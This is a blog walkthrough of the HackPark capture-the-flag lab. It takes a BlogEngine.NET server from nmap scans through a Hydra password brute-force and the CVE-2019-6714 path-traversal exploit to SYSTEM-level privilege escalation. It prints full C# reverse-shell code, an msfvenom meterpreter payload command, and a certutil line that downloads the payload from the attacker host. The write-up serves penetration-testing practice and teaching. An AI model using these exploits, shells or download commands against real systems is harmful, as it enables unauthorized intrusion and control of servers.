BLOG

HackPark walkthrough

$ nmap -p0-65535 10.10.88.187 -T5   
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 17:01 IST
Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 14.73% done; ETC: 17:06 (0:03:52 remaining)
Nmap scan report for 10.10.88.187
Host is up (0.17s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 216.20 seconds
$ nmap -sV -sC -p80,3389 10.10.88.187
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 17:07 IST
Nmap scan report for 10.10.88.187
Host is up (0.17s latency).

PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2021-06-30T11:22:49
|_Not valid after:  2021-12-30T11:22:49
|_ssl-date: 2021-07-01T11:37:45+00:00; -4s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -4s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.07 seconds

When we inspect the pages there is nothing fruitful found

Injection attacks didn’t yield any fruit full results on input forms

  • Comment Form

CommentForm

commentforminput.png

  • Contact Form

contact.png

contactforminput.png

  • Login Form

loginform.png

From the URL, we can observe that one of the parameter is admin. Lets use it as username and try to perform brute force attack

Using Burp

intruder.png

redirections.png

Using one of the password list from Seclists. We got the password 1qaz2wsx

password.png

Using Hydra

$ hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/worst-passwords-2017-top100-slashdata.txt 10.10.88.187 http-post-form '/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=qRY6dWng1F0cvqSV%2B4mQfRmxND5Ksw%2F6QtVhc%2FlkK3Vze3sRlKmX4tRKwROr3YZ%2Fa%2FwPPHHBDTmbZMGyqx3xjyB8518U%2F3xHggxcrZ%2BsYOK2OOyWTkNa1cwmJuDw1zkcwpzMRThR1PK3cMJ1%2BRZVuFz41QR4mLQ9jiBDS6rJG0oLSXO9trFqrxZhCzdGQ9NikJJhbEbkNLQdSVipgvGTYZ1lXqYfp%2BtJ4F43RqGZFrbPC6%2B2qFb7DPSU%2BlTzrX9wghEicFDp5T7RjuPMpXBgsylp7dSQB8ytzrrj0T%2BwfKQQuo1vJrLdUx%2Ff64MiEMuQ1pm%2FkGp7Hdu71TpshTI3D8SfmTCOXBPJEkztx%2FU8SZ4HOTiy&__EVENTVALIDATION=R%2BihqyiDlyMMnTQiDQbY83J%2FICfBn9zcT1n09t%2FNzwUShryVjKW8K7ix2NU2GcsolWVjNwNUPoEFuONe7nCT3ZY9ul6zQiwlKAn53pdKEiUv9w4PXuXvzemSpYtaeUxuw%2FhRD%2B4vf7Is5h5%2Fdw4mLLawu9Vk8MKPMEfrI226GwQVZCei&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed'
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-01 19:53:13
[DATA] max 16 tasks per 1 server, overall 16 tasks, 100 login tries (l:1/p:100), ~7 tries per task
[DATA] attacking http-post-form://10.10.88.187:80/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=qRY6dWng1F0cvqSV%2B4mQfRmxND5Ksw%2F6QtVhc%2FlkK3Vze3sRlKmX4tRKwROr3YZ%2Fa%2FwPPHHBDTmbZMGyqx3xjyB8518U%2F3xHggxcrZ%2BsYOK2OOyWTkNa1cwmJuDw1zkcwpzMRThR1PK3cMJ1%2BRZVuFz41QR4mLQ9jiBDS6rJG0oLSXO9trFqrxZhCzdGQ9NikJJhbEbkNLQdSVipgvGTYZ1lXqYfp%2BtJ4F43RqGZFrbPC6%2B2qFb7DPSU%2BlTzrX9wghEicFDp5T7RjuPMpXBgsylp7dSQB8ytzrrj0T%2BwfKQQuo1vJrLdUx%2Ff64MiEMuQ1pm%2FkGp7Hdu71TpshTI3D8SfmTCOXBPJEkztx%2FU8SZ4HOTiy&__EVENTVALIDATION=R%2BihqyiDlyMMnTQiDQbY83J%2FICfBn9zcT1n09t%2FNzwUShryVjKW8K7ix2NU2GcsolWVjNwNUPoEFuONe7nCT3ZY9ul6zQiwlKAn53pdKEiUv9w4PXuXvzemSpYtaeUxuw%2FhRD%2B4vf7Is5h5%2Fdw4mLLawu9Vk8MKPMEfrI226GwQVZCei&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[80][http-post-form] host: 10.10.88.187   login: admin   password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-01 19:53:18

Username: admin Password: 1qaz2wsx

we can use the credentials in login form. we will be greeted with Administrator Dashboard

administratordashboard.png

RDP is not vulnerable

$ nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 10.10.88.187
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 19:07 IST
Nmap scan report for 10.10.88.187
Host is up (0.36s latency).

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|_    RDSTLS: SUCCESS

Nmap done: 1 IP address (1 host up) scanned in 5.78 seconds

We can do brute force attack. But it may lead to account lockouts. Lets keep this as last resort


As we examine the Administrator Dashboard. In the about page, we can find the blogengine.net version number 3.3.6.0

versionnumber.png

With some google dorking, we can find the this version is vulnerable to remote code execution / Directory traversal with CVE-2019-6714

Lets use this exploit code to get our shell

Payload Code:

# Exploit Title: BlogEngine.NET <= 3.3.6 Directory Traversal RCE
# Date: 02-11-2019
# Exploit Author: Dustin Cobb
# Vendor Homepage: https://github.com/rxtur/BlogEngine.NET/
# Software Link: https://github.com/rxtur/BlogEngine.NET/releases/download/v3.3.6.0/3360.zip
# Version: <= 3.3.6
# Tested on: Windows 2016 Standard / IIS 10.0
# CVE : CVE-2019-6714

/*
 * CVE-2019-6714
 *
 * Path traversal vulnerability leading to remote code execution.  This
 * vulnerability affects BlogEngine.NET versions 3.3.6 and below.  This
 * is caused by an unchecked "theme" parameter that is used to override
 * the default theme for rendering blog pages.  The vulnerable code can
 * be seen in this file:
 *
 * /Custom/Controls/PostList.ascx.cs
 *
 * Attack:
 *
 * First, we set the TcpClient address and port within the method below to
 * our attack host, who has a reverse tcp listener waiting for a connection.
 * Next, we upload this file through the file manager.  In the current (3.3.6)
 * version of BlogEngine, this is done by editing a post and clicking on the
 * icon that looks like an open file in the toolbar.  Note that this file must
 * be uploaded as PostView.ascx. Once uploaded, the file will be in the
 * /App_Data/files directory off of the document root. The admin page that
 * allows upload is:
 *
 * http://10.10.10.10/admin/app/editor/editpost.cshtml
 *
 *
 * Finally, the vulnerability is triggered by accessing the base URL for the
 * blog with a theme override specified like so:
 *
 * http://10.10.10.10/?theme=../../App_Data/files
 *
 */

<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">
	static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);

	using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445)) {
		using(System.IO.Stream stream = client.GetStream()) {
			using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
				streamWriter = new System.IO.StreamWriter(stream);
						
				StringBuilder strInput = new StringBuilder();

				System.Diagnostics.Process p = new System.Diagnostics.Process();
				p.StartInfo.FileName = "cmd.exe";
				p.StartInfo.CreateNoWindow = true;
				p.StartInfo.UseShellExecute = false;
				p.StartInfo.RedirectStandardOutput = true;
				p.StartInfo.RedirectStandardInput = true;
				p.StartInfo.RedirectStandardError = true;
				p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
				p.Start();
				p.BeginOutputReadLine();

				while(true) {
					strInput.Append(rdr.ReadLine());
					p.StandardInput.WriteLine(strInput);
					strInput.Remove(0, strInput.Length);
				}
			}
		}
    	}
    }

    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
   	StringBuilder strOutput = new StringBuilder();

       	if (!String.IsNullOrEmpty(outLine.Data)) {
       		try {
                	strOutput.Append(outLine.Data);
                    	streamWriter.WriteLine(strOutput);
                    	streamWriter.Flush();
                } catch (Exception err) { }
        }
    }

</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>

Do the tweaking’s to payload and Save the payload as PostView.ascx

Using the URL upload the file:

http://10.10.88.187/admin/app/editor/editpost.cshtml

editpage.png

uploadedfile.png

Open the listner and go to this URL to get the reverse shell on listner

http://10.10.88.187/?theme=../../App_Data/files

listnerurl.png

revshell.png

Getting Proper Stabilized shell

Create payload using msfvenom

$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.39.244 LPORT=9866 -f exe -o revshell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of exe file: 73802 bytes
Saved as: revshell.exe

copy it to target

c:\Users\Public>certutil -urlcache -f http://10.11.39.244:8991/revshell.exe revshell.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

Grabbing the shell

stableshell.png


Using winpeas for checking possible PrivEsc tactics

By running winpeas, we got to know that SystemScheduler folder r/w access to everyone

EveryoneWriteread.png

We can try to stop the service, so that we can perform dll hijacking PrivEsc

schdcantstop.png

After searching different types of logs in SystemScheduler folder, we got to know that Message.exe is restarted every 30 seconds.

logs3.png

messageexe.png

As the SystemScheduler folder has world r/w access. Let’s created payload for Privileged Shell

msfpayloadprivshell.png

Uploading the shell to target

uploadprivshell.png

On the listner, we got the connection

administrator.png

Getting User flag

userflag.png

Getting Root flag

rootflag.png

proof.png

Host is vulnerable to Juicy Potato attack too

juicypotato.png

More about Juicy Potato attack can be found in Alfred Walkthrough